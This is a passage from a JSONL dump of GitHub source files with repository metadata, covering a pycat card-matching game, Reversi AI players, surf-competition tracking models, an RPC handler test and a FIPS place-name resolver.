<ul>%s<\/ul>' %\n '\n'.join(\n ['<li><a href=\"%s\">%s<\/a><\/li>' % (\n domhelpers.getNodeText(link), domhelpers.getNodeText(title))\n for (title, link) in itms])\n ).addCallback(lambda s: (request.write(s),request.finish())).addErrback(\n lambda e: (request.write('Error: %s' % e),request.finish()))\n return server.NOT_DONE_YET\n\nresource = LJSyndicatingResource()\n","repo_name":"ActiveState/OpenKomodoIDE","sub_path":"contrib/twisted/TwistedWeb-0.6.0/doc/examples/lj.rpy.py","file_name":"lj.rpy.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"72"} +{"seq_id":"40045448266","text":"from pycat.window import Window\nfrom pycat.sprite import Sprite, RotationMode\nfrom pycat.keyboard import KeyCode\nfrom pycat.scheduler import Scheduler\nfrom pycat.collision import is_aabb_collision\nfrom pycat.label import Label\nimport random\n\nw = Window(background_image=\"forest_04.png\", draw_sprite_rects=True)\n\ncL_sprite = [] \n\nclass Card (Sprite):\n\n def on_create(self):\n self.is_visible = False\n \n\n def on_left_click(self):\n if self in cL_sprite:\n pass\n else:\n if len(cL_sprite) < 2 :\n self.is_visible = True\n cL_sprite.append(self)\n\nscore = 0\n\nclass Button(Sprite):\n\n def on_create(self):\n self.image = \"button.png\"\n self.scale = float(0.66)\n self.x = 1100\n self.y = 300\n def on_left_click(self):\n if len(cL_sprite) == 2:\n sprite1:Sprite = cL_sprite[0]\n sprite2:Sprite = cL_sprite[1]\n if sprite1.image == sprite2.image: \n sprite1.delete()\n sprite2.delete()\n button.score += 1\n score_label.text = 'BEST MATCH: '+str(button.score)\n else:\n sprite1.is_visible = False \n sprite2.is_visible = False\n cL_sprite.clear()\n\nbutton = w.create_sprite(Button)\nbutton.score = 0\n\nscore_label = Label(\"BEST MATCH: 0\",x=1000,y=400)\nw.add_label(score_label)\n\np1 = w.create_sprite(Card, x = 200,y = 100, image = \"avatar_01.png\", scale = float(1.6))\np2 = w.create_sprite(Card, x = 200,y = 220, image = \"avatar_02.png\", scale = float(1.6))\np3 = w.create_sprite(Card, x = 200,y = 340, image = \"avatar_03.png\", scale = float(1.6))\np4 = w.create_sprite(Card, x = 200,y = 460, image = \"avatar_04.png\", scale = float(1.6))\np5 = w.create_sprite(Card, x = 400,y = 100, image = \"avatar_01.png\", scale = float(1.6))\np6 = w.create_sprite(Card, x = 400,y = 220, image = \"avatar_02.png\", scale = float(1.6))\np7 = w.create_sprite(Card, x = 400,y = 340, image = \"avatar_03.png\", scale = float(1.6))\np8 = w.create_sprite(Card, x = 400,y = 460, image = \"avatar_04.png\", scale = float(1.6))\np08 = w.create_sprite(Card, x = 600,y = 100, image = \"avatar_01.png\", scale = float(1.6))\np07 = w.create_sprite(Card, x = 600,y = 220, image = \"avatar_02.png\", scale = float(1.6))\np06 = w.create_sprite(Card, x = 600,y = 340, image = \"avatar_03.png\", scale = float(1.6))\np05 = w.create_sprite(Card, x = 600,y = 460, image = \"avatar_04.png\", scale = float(1.6))\np04 = w.create_sprite(Card, x = 800,y = 100, image = \"avatar_01.png\", scale = float(1.6))\np03 = w.create_sprite(Card, x = 800,y = 220, image = \"avatar_02.png\", scale = float(1.6))\np02 = w.create_sprite(Card, x = 800,y = 340, image = \"avatar_03.png\", scale = float(1.6))\np01 = w.create_sprite(Card, x = 800,y = 460, image = \"avatar_04.png\", scale = 
float(1.6))\n\nw.run()","repo_name":"duck003/pypeanuts.github.io","sub_path":"chapter/chapter04/4-1ft.py","file_name":"4-1ft.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23020548374","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport copy\nimport random\nimport ReverseCommon\nimport ReverseBoard\nimport Game\nimport sys, os\nimport pickle\nimport numpy as np\nfrom functions import sigmoid, softmax, dtanh, init_KeysCount, myMax, myMin, myRandom, dMean_squared_error\n\n\"\"\" Base class for players (AIs included) \"\"\"\nclass Player:\n def __init__(self, color):\n \"\"\" Constructor \"\"\"\n self._color = color\n self.network = {}\n self._history = []\n\n def next_move(self, board):\n \"\"\" Return the next move \"\"\"\n pass\n\n def save_network(self, file_name):\n pass\n\n def update_network(self, ritu=1, weight_init_std = 0.01):\n pass\n\n @property\n def color(self):\n \"\"\" Return this player's color \"\"\"\n return self._color\n\n\"\"\" AI that places stones at random \"\"\"\nclass RandomAi(Player):\n def next_move(self, board):\n # all candidate squares where a stone can be placed\n all_candidates = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n # pick the next move at random\n index = random.randint(0, len(all_candidates) - 1)\n return all_candidates[index]\n\n\"\"\"AI that plays wherever the current move captures the most stones\"\"\"\nclass NextStoneMaxAi(Player):\n def next_move(self, board):\n # all candidate squares where a stone can be placed\n all_candidatess = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n # list of squares where this move captures the most stones\n filtered_candidates = []\n max_score = -1\n for candidates in all_candidatess:\n next_board = ReverseCommon.put_stone(board.stone_status, self._color, candidates[0], candidates[1])\n score = ReverseCommon.get_score(next_board, self._color)\n if score >= max_score:\n filtered_candidates.append(candidates)\n max_score = score\n\n return filtered_candidates[random.randint(0, len(filtered_candidates) - 1)]\n\n\"\"\"A human player.\"\"\"\nclass Human(Player):\n def next_move(self, board):\n all_candidates = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n while True:\n try:\n # input in the form x,y\n next_move_str = raw_input(\"next_move > \")\n next_move_str_split = next_move_str.split(\",\")\n if len(next_move_str_split) == 2:\n next_move = [int(next_move_str_split[0]), int(next_move_str_split[1])]\n if next_move in all_candidates:\n return next_move\n else:\n print (\"can't put there.\")\n except ValueError:\n print (\"format error.\")\n\n\"\"\" AI that knows the bare minimum about good and bad moves \"\"\"\nclass RandomAiKnowGoodMove(Player):\n def next_move(self, board):\n known_good_moves = [[0, 0], [0, 7], [7, 0], [7, 7]]\n known_bad_moves = [[0, 1], [1, 0], [1, 1], [0, 6], [1, 6], [1, 7], [6, 0], [6, 1], [7, 1], [7, 6], [6, 7], [6, 6]]\n all_candidates = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n # take a corner whenever one is available\n good_moves = list(filter(lambda good_move: good_move in known_good_moves, all_candidates))\n\n if len(good_moves) > 0:\n return good_moves[random.randint(0, len(good_moves) - 1)]\n\n # avoid the squares adjacent to the corners\n #not_bad_moves = filter(lambda not_bad_move: not_bad_move not in (known_good_moves + known_bad_moves), all_candidates)\n not_bad_moves = list(filter(lambda not_bad_move: not_bad_move not in (known_good_moves + known_bad_moves), all_candidates))\n if len(not_bad_moves) > 0:\n return not_bad_moves[random.randint(0, len(not_bad_moves) - 1)]\n\n return all_candidates[random.randint(0, len(all_candidates) - 1)]\n\n\n\"\"\" AI that places stones using DQN (Deep Q-Network) \"\"\"\nclass DeepQNetWork(Player):\n def 
__init__(self, color, filename):\n super(DeepQNetWork, self).__init__(color)\n self.KeysCount = {}\n self.load_network(filename)\n\n def load_network(self, file_name=\"DQN_BLACK.pkl\"):\n if os.path.isfile(file_name) :\n with open(file_name, 'rb') as f:\n obj = pickle.load(f)\n self.KeysCount = obj[0]\n self.network = obj[1]\n else:\n self.KeysCount = init_KeysCount(8, 0.5, 5)\n\n count = self.network.get('SC', 0)\n print(\"cumulative training=%s\" %(count))\n\n #print(sorted(self.KeysCount.items(), key=lambda x: x[0]))\n for obj in sorted(self.KeysCount.items(), key=lambda x: int(x[0])):\n print(str(obj[0]) + \"=\" + str(obj))\n\n def save_network(self, file_name=\"DQN_BLACK.pkl\"):\n with open(file_name, 'wb') as f:\n pickle.dump([self.KeysCount, self.network], f)\n\n def update_network(self, ritu=1, weight_init_std = 0.001):\n #print('*'*10 + '(update_network)' + '*'*10)\n #print(str(select) + \"::\" + str(ReverseCommon.IndexToPoint(select)))\n #self._history.append([Key,select])\n for i in range(0,len(self._history)):\n key = self._history[i][0]\n act = self._history[i][1]\n #print(str(i+1) + \" key=\" + key + \" act=\" + str(act) + \" qWait=\" + str(self.network[key][act]))\n if(key in self.network):\n acc = self.network[key][act] + ritu * weight_init_std\n if acc > 10:\n acc = 10\n elif acc < -10:\n acc = -10\n self.network[key][act] = acc\n #self.network[key][act] += ((i % 22) + 1) * ritu * weight_init_std\n #print(self.network[key])\n self._history = []\n\n def next_move(self, board):\n #Key = ReverseCommon.boardToKey(board.stone_status)\n Key = ReverseCommon.boardToKey3(board.stone_status)\n #print(Key)\n actions = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n #print(actions)\n #print(Key in self.network)\n if(not (Key in self.network)):\n self.wait_set(Key, actions, board)\n\n #print(self.network)\n #print(self.network[Key])\n #print(len(self._history))\n if (Key in self.network):\n if self._color == ReverseCommon.BLACK:\n select = min(self.network[Key],key=(lambda x:self.network[Key][x]))\n else:\n select = max(self.network[Key],key=(lambda x:self.network[Key][x]))\n else:\n # pick the next move at random from all candidate squares\n #all_candidates = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n #index = random.randint(0, len(all_candidates) - 1)\n #select = ReverseCommon.PointToIndex(all_candidates[index])\n\n # all candidate squares where a stone can be placed\n all_candidatess = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n # list of squares where this move captures the most stones\n filtered_candidates = []\n max_score = -1\n for candidates in all_candidatess:\n next_board = ReverseCommon.put_stone(board.stone_status, self._color, candidates[0], candidates[1])\n score = ReverseCommon.get_score(next_board, self._color)\n if score >= max_score:\n filtered_candidates.append(candidates)\n max_score = score\n\n index = random.randint(0, len(filtered_candidates) - 1)\n select = ReverseCommon.PointToIndex(filtered_candidates[index])\n #filtered_candidates[random.randint(0, len(filtered_candidates) - 1)]\n\n #print(str(select) + \"::\" + str(ReverseCommon.IndexToPoint(select)))\n self._history.append([Key,select])\n return ReverseCommon.IndexToPoint(select)\n\n \"\"\"\n Implements a dropout-like cap on stored states.\n This learning model trains the second player (white).\n The number of possible Keys grows with the move number\n (move 2: 6 stones, 6**2; move 4: 8 stones, 8**2; ...; move 60: 64 stones, 64**2).\n dropout_rait=0.5 is provisional;\n the cap is adjusted as (number of combinations per move) * dropout_rait.\n \"\"\"\n def wait_set(self, Key, actions, board):\n\n aa = ReverseCommon.get_remain(board.stone_status)\n bb = self.KeysCount[str(64-aa)]\n #print(\"%2d::%s::%2d::%2d::%2d::%2d\" % (len(self._history),Key,aa,64-aa,bb[0],bb[1]))\n\n #if (len(self._history) < 2): return\n if (bb[1] >= bb[0]): return\n #print(Key)\n 
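# KeysCount[str(move_number)] holds [cap, used]; once 'used' reaches the cap, no further board states are registered for that depth (the dropout-style budget described in the docstring)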
self.KeysCount[str(64-aa)][1] += 1\n wait = {}\n Waits = np.random.random(len(actions))\n i = 0\n for wact in actions:\n wPoint = ReverseCommon.PointToIndex(wact)\n wait[wPoint] = Waits[i]\n i += 1\n #print(str(wact) + \":::\" + str(wPoint) + \":::\" + str(wait[wPoint]))\n\n self.network[Key] = wait\n #print(self.network[Key] )\n\nclass QNetWork(Player):\n def __init__(self, color, filename):\n super(QNetWork, self).__init__(color)\n self.load_network(filename)\n\n def load_network(self,file_name):\n if os.path.isfile(file_name) :\n with open(file_name, 'rb') as f:\n self.network = pickle.load(f)\n\n def save_network(self, file_name):\n with open(file_name, 'wb') as f:\n pickle.dump(self.network, f)\n\n def update_network(self, ritu=1, weight_init_std = 0.001):\n ALPHA = 0.1\n GAMMA = 0.99\n for i in range(0,len(self._history)-1):\n Key, select = self._history[i][0], self._history[i][1]\n #self.network[Key][select] += ALPHA * (reward + GAMMA*self.network[next_s].max() - self.network[Key][select])\n next_key =self._history[i+1][0]\n if next_key in self.network:\n a = min(self.network[next_key],key=(lambda x:self.network[next_key][x]))\n aaa = self.network[next_key][a]\n #print(self.network[next_key][a])\n else:\n aaa = 0.5\n #print(\"Key=%s::select=%s\" %(Key,select))\n bbb = 0.0\n if Key in self.network:\n bbb = self.network[Key][select]\n self.network[Key][select] += ALPHA * (ritu + GAMMA*aaa - bbb)\n #print(\"bef=%f: aft=%f\" %(mmm,self.network[Key][select]))\n #print(\"bbb=%s::aaa=%s\" %(bbb,aaa))\n self._history = []\n\n def wait_set(self, Key, actions):\n #print(Key)\n if len(actions) < 2:\n return\n wait = {}\n Waits = np.random.random(len(actions))\n i = 0\n for wact in actions:\n wPoint = ReverseCommon.PointToIndex(wact)\n wait[wPoint] = Waits[i]\n i += 1\n\n self.network[Key] = wait\n\n def next_move(self, board):\n Key = ReverseCommon.boardToKey3(board.stone_status)\n #print(Key)\n # All candidate points where a stone can be placed\n actions = ReverseCommon.get_puttable_points(board.stone_status, self._color)\n\n if(not (Key in self.network)):\n self.wait_set(Key, actions)\n\n if (Key in self.network):\n if self._color == ReverseCommon.BLACK:\n select = min(self.network[Key],key=(lambda x:self.network[Key][x]))\n else:\n select = max(self.network[Key],key=(lambda x:self.network[Key][x]))\n #print(\"select=%s\" % (select))\n result = ReverseCommon.IndexToPoint(select)\n else:\n # Pick the next move at random\n index = random.randint(0, len(actions) - 1)\n result = actions[index]\n select = ReverseCommon.PointToIndex(result)\n\n self._history.append([Key,select])\n return result\n","repo_name":"mit4351/Reversi","sub_path":"wx_dqn_bkp/Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":11649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31213715495","text":"import datetime\nimport re\n\nfrom app import Config, app, db, parsers\nfrom app.models import mixins\n\n\nclass HeatResult(db.Model):\n heat_id = db.Column(db.Integer, db.ForeignKey(\"heat.id\"), primary_key=True)\n athlete_id = db.Column(\n db.Integer,\n db.ForeignKey(\"athlete.id\"),\n # primary_key=True\n )\n\n index = db.Column(db.Integer, primary_key=True)\n score = db.Column(db.Numeric(4, 2), default=None)\n\n heat = db.relationship(\"Heat\", back_populates=\"athletes\")\n athlete = db.relationship(\"Athlete\", back_populates=\"heats\")\n\n\ndef _is_placeholder_athlete_name(athlete_name):\n # probably overkill on precision but whatever\n regexs = [\n \"Round of [0-9]{1,2}, Heat [0-9]{1,2} winner\",\n \"finals, Heat [0-9]{1,2} winner$\",\n \"Event seed #[0-9]{1,2}\",\n \"Round seed #[0-9]{1,2}\",\n ]\n 
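# For instance (illustrative): \"Round of 16, Heat 3 winner\" and \"Event seed #2\"\n # match one of these patterns, while a real competitor name does not.\n 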
\"finals, Heat [0-9]{1,2} winner$\",\n \"Event seed #[0-9]{1,2}\",\n \"Round seed #[0-9]{1,2}\",\n ]\n if any([re.search(r, athlete_name) is not None for r in regexs]):\n return True\n return False\n\n\nclass Athlete(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(128))\n heats = db.relationship(\"HeatResult\", back_populates=\"athlete\")\n\n\nclass Heat(mixins.Updatable, db.Model):\n id = db.Column(db.Integer, primary_key=True)\n completed = db.Column(db.Boolean, default=False)\n status = db.Column(db.Integer, default=0)\n round_id = db.Column(db.Integer, db.ForeignKey(\"round.id\"))\n athletes = db.relationship(\"HeatResult\", back_populates=\"heat\")\n\n @classmethod\n def create(cls, **kwargs):\n obj = cls(completed=False, **kwargs)\n obj.update()\n return obj\n\n def _do_update(self):\n try:\n status, scores = parsers.get_heat_data(self.round.url, self.id)\n except Exception as e:\n app.logger.error(e)\n return\n\n app.logger.debug(\n f\"Read scores {scores} for heat {self.id} with status {status}\"\n )\n self.update_with_status_and_scores(status, scores)\n\n def update_with_status_and_scores(self, status, scores):\n self.status = status\n\n for index, (athlete_name, score) in enumerate(scores):\n # if we're being reported a placeholder athlete name,\n # then make sure that the heat hasn't started yet. If it has,\n # we need to investigate\n if _is_placeholder_athlete_name(athlete_name) and status != 0:\n app.logger.warn(\n f\"Still using placeholder name {athlete_name} \"\n f\"in ongoing heat {self.id}\"\n )\n heat_result = HeatResult.query.filter_by(\n heat=self, index=index\n )\n\n try:\n athlete = heat_result.first().athlete\n except AttributeError:\n # case 1: there's no existing entry, so just move on and\n # pretend this never happend\n continue\n\n # case 2: that heat result has a placeholder\n # name attached to it: delete it and move on\n if _is_placeholder_athlete_name(athlete.name):\n app.logger.warn(\n f\"Removing placeholder heat result from heat {self.id}\"\n )\n heat_result.delete()\n continue\n # case 3: that heat used to have a real athete associated\n # with it. I guess keep it for now?\n else:\n athlete_name = athlete.name\n\n # create athlete if they don't exist. 
# create athlete if they don't exist. Note that this means\n # we will create some placeholder athletes, but\n # they won't have any heat results after things get updated\n athlete = Athlete.query.filter_by(name=athlete_name).first()\n if athlete is None:\n athlete = Athlete(name=athlete_name)\n app.logger.debug(f\"Adding athlete {athlete_name} to database\")\n db.session.add(athlete)\n db.session.commit()\n\n # index heat result by the heat and their order in the heat\n # this way when rounds update from some TBD placeholder to\n # a real athlete name we can update the athlete name accordingly\n # the cost of this is having some placeholder athlete names in\n # our athlete db but that seems like a small price to pay\n heat_result = HeatResult.query.filter_by(\n heat=self, index=index\n ).first()\n\n # first case: this heat result hasn't been created yet;\n # instantiate it and add it to our session\n if heat_result is None:\n heat_result = HeatResult(\n heat=self, index=index, athlete=athlete\n )\n self.athletes.append(heat_result)\n else:\n # second case: the heat result exists but the athlete\n # it was instantiated with is being updated\n if heat_result.athlete.name != athlete_name:\n # if this is not because the instantiated athlete was\n # a placeholder, we won't do this automatically, but\n # will leave it to you to do manually if you think this\n # is correct\n if not _is_placeholder_athlete_name(\n heat_result.athlete.name\n ):\n app.logger.warn(\n \"Athlete {} is being replaced by \"\n \"athlete {} in heat {}.\".format(\n heat_result.athlete.name, athlete_name, self.id\n )\n )\n\n # update the heat result athlete\n heat_result.athlete = athlete\n\n # update the heat result score\n heat_result.score = score\n self.completed = status == 2\n\n\nclass Round(mixins.Updatable, db.Model):\n id = db.Column(db.Integer, primary_key=True)\n completed = db.Column(db.Boolean, default=False)\n number = db.Column(db.Integer)\n event_id = db.Column(db.Integer, db.ForeignKey(\"event.id\"))\n heats = db.relationship(\"Heat\", backref=\"round\", lazy=\"dynamic\")\n\n @property\n def url(self):\n return parsers.get_round_url(self)\n\n @property\n def sorted_heats(self):\n return sorted(self.heats, key=lambda heat: heat.id)\n\n @classmethod\n def create(cls, **kwargs):\n obj = cls(**kwargs)\n heat_ids = parsers.get_heat_ids(obj.url)\n for id in heat_ids:\n app.logger.debug(f\"Creating heat {id}\")\n Heat.create(id=id, round=obj)\n obj.completed = all([heat.completed for heat in obj.heats])\n return obj\n\n def _do_update(self):\n no_more_updates = False\n # default in case there are no heats to update\n completed = False\n heats = sorted(self.heats, key=lambda h: h.id)\n for heat in heats:\n if no_more_updates:\n # only update upcoming heats if they're currently\n # populated by placeholder athlete names\n athletes = [r.athlete.name for r in heat.athletes]\n if any(list(map(_is_placeholder_athlete_name, athletes))):\n app.logger.info(f\"Updating athletes for heat {heat.id}\")\n heat.update()\n continue\n else:\n app.logger.info(f\"Updating heat {heat.id}\")\n completed = heat.update()\n\n # if this heat is upcoming, then all subsequent\n # heats in this round are by definition upcoming\n # too, so we can stop trying to update heats\n if heat.status == 0:\n no_more_updates = True\n\n # if the last heat returned completed = True,\n # then we're done\n self.completed = completed\n\n\nclass Event(mixins.Updatable, db.Model):\n id = db.Column(db.Integer, primary_key=True)\n stat_id = db.Column(db.Integer)\n name = db.Column(db.String(128))\n completed = db.Column(db.Boolean, default=False)\n year = 
db.Column(db.Integer, db.ForeignKey(\"season.year\"))\n rounds = db.relationship(\"Round\", backref=\"event\", lazy=\"dynamic\")\n\n @property\n def url(self):\n return parsers.get_event_url(self)\n\n @property\n def sorted_rounds(self):\n return sorted(self.rounds, key=lambda r: r.number)\n\n @classmethod\n def create(cls, id: int, stat_id: int, name: str, year: int, **kwargs):\n obj = cls(id=id, stat_id=stat_id, name=name, year=year)\n\n # first verify that status is ok and that we're close enough to the\n # event to warrant building it\n status, start_date = parsers.get_event_data_from_event_homepage(obj)\n if status in (\"canceled\", \"postponed\"):\n raise parsers.EventNotReady(\n \"Status for event {} is currently {}\".format(obj.name, status)\n )\n elif (\n datetime.datetime.now()\n + datetime.timedelta(days=Config.LEAD_DAYS_FOR_EVENT_CREATION)\n ) < start_date:\n raise parsers.EventNotReady(\n \"Start date for event {} is {} days away, \"\n \"stopping creation\".format(\n obj.name, (start_date - datetime.datetime.now()).days\n )\n )\n\n # double check that event is ready to be scraped by\n # making sure that all the rounds have valid links\n try:\n round_ids = parsers.get_round_ids(obj)\n except parsers.EventNotReady:\n raise parsers.EventNotReady(\n \"No valid round links for event {}\".format(obj.name)\n )\n\n # initialize all the internal rounds and heats\n kwargs = {\"event\": obj, \"completed\": False}\n for n, round_id in enumerate(round_ids):\n app.logger.debug(f\"Creating round {round_id}\")\n if n < 2:\n round_ = Round.create(id=round_id, number=n, **kwargs)\n continue\n else:\n round_ = Round(id=round_id, number=n, **kwargs)\n break\n\n rounds = parsers.parse_bracket(round_.url)\n for i in range(1, len(rounds) + 1):\n heats = rounds[round_.id]\n for id in sorted(heats.keys()):\n heat = Heat(id=id, completed=False, round=round_)\n status, scores = heats[id]\n heat.update_with_status_and_scores(status, scores)\n\n round_.completed = all([i.completed for i in round_.heats])\n\n if i < len(rounds):\n app.logger.debug(f\"Creating round {round_id + i}\")\n round_ = Round(id=round_id + i, number=2 + i, **kwargs)\n\n # if this is an event from the past, we can set it completed up front\n obj.completed = all([round_.completed for round_ in obj.rounds])\n return obj\n\n @property\n def results(self):\n csv_string = \"RoundNum,HeatNum,AthleteName,Score\"\n for i, round_ in enumerate(self.rounds):\n for j, heat in enumerate(round_.heats):\n for athlete in heat.athletes:\n score = athlete.score or 0.0\n csv_string += \"\\n{},{},{},{:0.2f}\".format(\n i, j, athlete.athlete.name, score\n )\n return csv_string\n\n def _do_update(self):\n sorted_rounds = sorted(self.rounds, key=lambda round: round.id)\n\n # do first two rounds normally\n for round_ in sorted_rounds[:2]:\n if not round_.update():\n break\n else:\n # if both the first two rounds are completed,\n # start iterating through the bracket rounds\n rounds = parsers.parse_bracket(sorted_rounds[2].url)\n all_rounds_complete = True\n\n for round_ in sorted_rounds[2:]:\n if round_.completed:\n continue\n\n all_heats_complete = True\n for heat in round_.sorted_heats:\n if heat.completed:\n continue\n\n status, scores = rounds[round_.id][heat.id]\n heat.update_with_status_and_scores(status, scores)\n\n if not heat.status:\n # if this heat is still upcoming, there's\n # no point in updating anything after this\n break\n all_heats_complete &= heat.completed\n else:\n # if we never broke, then all of the heats\n # have at least started, so 
mark whether the\n # round has completed and move on to the next\n # one to account for potentially overlapping\n # heats between rounds\n round_.completed = all_heats_complete\n all_rounds_complete &= all_heats_complete\n continue\n\n # otherwise if we broke, one of this round's\n # heats hasn't started which means there's no\n # need to look at later rounds, so\n break\n else:\n # if all the rounds have completed, mark\n # the whole event as done\n self.completed = all_rounds_complete\n\n\nclass Season(db.Model):\n year = db.Column(db.Integer, primary_key=True)\n events = db.relationship(\"Event\", backref=\"season\", lazy=\"dynamic\")\n\n @property\n def url(self):\n return parsers.get_season_url(self)\n\n @classmethod\n def create(cls, year, **kwargs):\n # allow for the possibility that the season starts\n # late in the year before\n if year > (datetime.datetime.now().year + 1):\n raise ValueError(f\"Cannot create season for future year {year}\")\n\n # instantiate the season then add all the events we can to it\n obj = cls(year=year, **kwargs)\n db.session.add(obj)\n for name, id in parsers.get_event_ids(obj.url).items():\n # skipping freshwater pro by default since\n # its format is so different\n if name == \"freshwater-pro\":\n continue\n\n # don't need to create events that have already been created;\n # not quite sure why or when this might occur, but it is\n # cheap to guard against\n event = Event.query.filter_by(name=name, id=id, season=obj).first()\n if event is not None:\n continue\n\n try:\n stat_id = parsers.get_event_stat_id(id, year, name)\n except ValueError:\n app.logger.info(\n f\"Skipping creation of event {name} {year} \"\n \"because no stat ID was available\"\n )\n continue\n\n # ignore this event if it's not ready yet\n try:\n event = Event.create(\n name=name, id=id, stat_id=stat_id, year=year\n )\n except parsers.EventNotReady:\n continue\n else:\n obj.events.append(event)\n db.session.add(event)\n db.session.commit()\n return obj\n\n\ndef delete_season(year):\n season = Season.query.filter_by(year=year)\n events = Event.query.filter_by(season=season.first())\n for event in events:\n rounds = Round.query.filter_by(event=event)\n for round in rounds:\n heats = Heat.query.filter_by(round=round)\n for heat in heats:\n HeatResult.query.filter_by(heat=heat).delete()\n heats.delete()\n rounds.delete()\n events.delete()\n season.delete()\n","repo_name":"alecgunny/kook-tracker","sub_path":"kook-tracker/app/models/wsl.py","file_name":"wsl.py","file_ext":"py","file_size_in_byte":15695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74988259","text":"from unittest.mock import AsyncMock\n\nimport pytest\n\nfrom crm.agency_cabinet.common.server.common.structs import TaskStatuses\nfrom crm.agency_cabinet.ord.common import structs\nfrom crm.agency_cabinet.ord.proto import reports_pb2, request_pb2, common_pb2\nfrom crm.agency_cabinet.ord.common.exceptions import UnsuitableAgencyException, NoSuchReportException\n\n\n@pytest.fixture(autouse=True)\ndef procedure(mocker):\n mock = AsyncMock()\n mock.return_value = structs.ReportExportResponse(report_export_id=1, status=TaskStatuses.in_progress)\n\n mocker.patch(\n \"crm.agency_cabinet.ord.server.src.procedures.ReportExport\",\n return_value=mock,\n )\n\n return mock\n\n\nasync def test_export_report(handler, procedure):\n expected = reports_pb2.ReportExportOutput(\n result=reports_pb2.ReportExport(\n report_export_id=1,\n status=1\n )\n )\n\n request_pb = request_pb2.RpcRequest(\n 
report_export=reports_pb2.ReportExportInput(\n agency_id=1,\n report_id=1\n )\n )\n\n data = await handler(request_pb.SerializeToString())\n res = reports_pb2.ReportExportOutput.FromString(data)\n\n assert res == expected\n\n\n@pytest.mark.parametrize(\n ('side_effect', 'expected_message'),\n [\n (\n UnsuitableAgencyException,\n reports_pb2.ReportExportOutput(unsuitable_agency=common_pb2.ErrorMessageResponse(message=''))\n ),\n (\n NoSuchReportException,\n reports_pb2.ReportExportOutput(no_such_report=common_pb2.ErrorMessageResponse(message=''))\n ),\n ]\n)\nasync def test_returns_error(handler, mocker, side_effect, expected_message):\n mock = AsyncMock()\n mock.return_value = None\n mock.side_effect = [side_effect]\n\n with mocker.patch(\n \"crm.agency_cabinet.ord.server.src.procedures.ReportExport\",\n return_value=mock,\n ):\n input_pb = request_pb2.RpcRequest(\n report_export=reports_pb2.ReportExportInput(\n agency_id=1,\n report_id=1\n )\n )\n\n result = await handler(input_pb.SerializeToString())\n\n assert reports_pb2.ReportExportOutput.FromString(result) == expected_message\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crm/tests/handlers/test_export_report.py","file_name":"test_export_report.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26268451687","text":"#!/usr/bin/python\nfrom __future__ import print_function\n\nimport argparse\nimport os\nimport sys\nfrom pprint import pprint\n\ndirroot = os.path.dirname(\n os.path.dirname(\n os.path.realpath(__file__)))\n\nsys.path.extend([os.path.join(dirroot, 'retrieval'),\n os.path.join(dirroot, 'preprocess')])\n\nfrom acser import Acser\nfrom fipser import Fipser\n\nclass Acorn(object):\n def __init__(self):\n self.fips = Fipser()\n self.acs = Acser()\n \n def resolve(self, loc, schema=None):\n f = self.resolve_fips(loc)\n g = self.resolve_geo(f, schema)\n \n return {'fips': f,\n 'geoid': g}\n\n def resolve_fips(self, loc):\n f = self.fips.resolve(loc)\n return f\n\n def resolve_geo(self, fips, schema=None):\n s, c, p = fips['state_fips'], fips['county_fips'], fips['place_fips']\n g = self.acs.geo_lookup(s, c, p, schema)\n \n return g\n\ndef _get_args():\n parser = argparse.ArgumentParser(description='Resolve a place name into FIPS \\\n Codes and GeoID')\n parser.add_argument('place', metavar='loc', type=str,\n help='A string of the location to resolve')\n \n parser.add_argument('--schema', nargs='?', type=str, \n default=None, help='The schema to use to resolve geoheaders.')\n\n args = parser.parse_args()\n return args\n\ndef main():\n ac = Acorn()\n args = _get_args()\n \n result = ac.resolve(args.place, args.schema)\n\n print(args.place, args.schema)\n print('\\t', end='')\n pprint(result, indent=2)\n\nif __name__ == '__main__':\n main()\n","repo_name":"giantoak/acorn","sub_path":"acorn/retrieval/acorn.py","file_name":"acorn.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5512914809","text":"import globals\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport do_mpc\nfrom casadi import *\nfrom casadi.tools import *\n\nimport sys\n\nfrom model import simple_bicycle_model\nfrom map import Map, Obstacle\nfrom reference_path import ReferencePath\nfrom simulator import Simulator\nfrom MPC import MPC\n\nsys.path.append('../../')\n\n\ndef environment_setup(map):\n\n # Load map file\n map = 
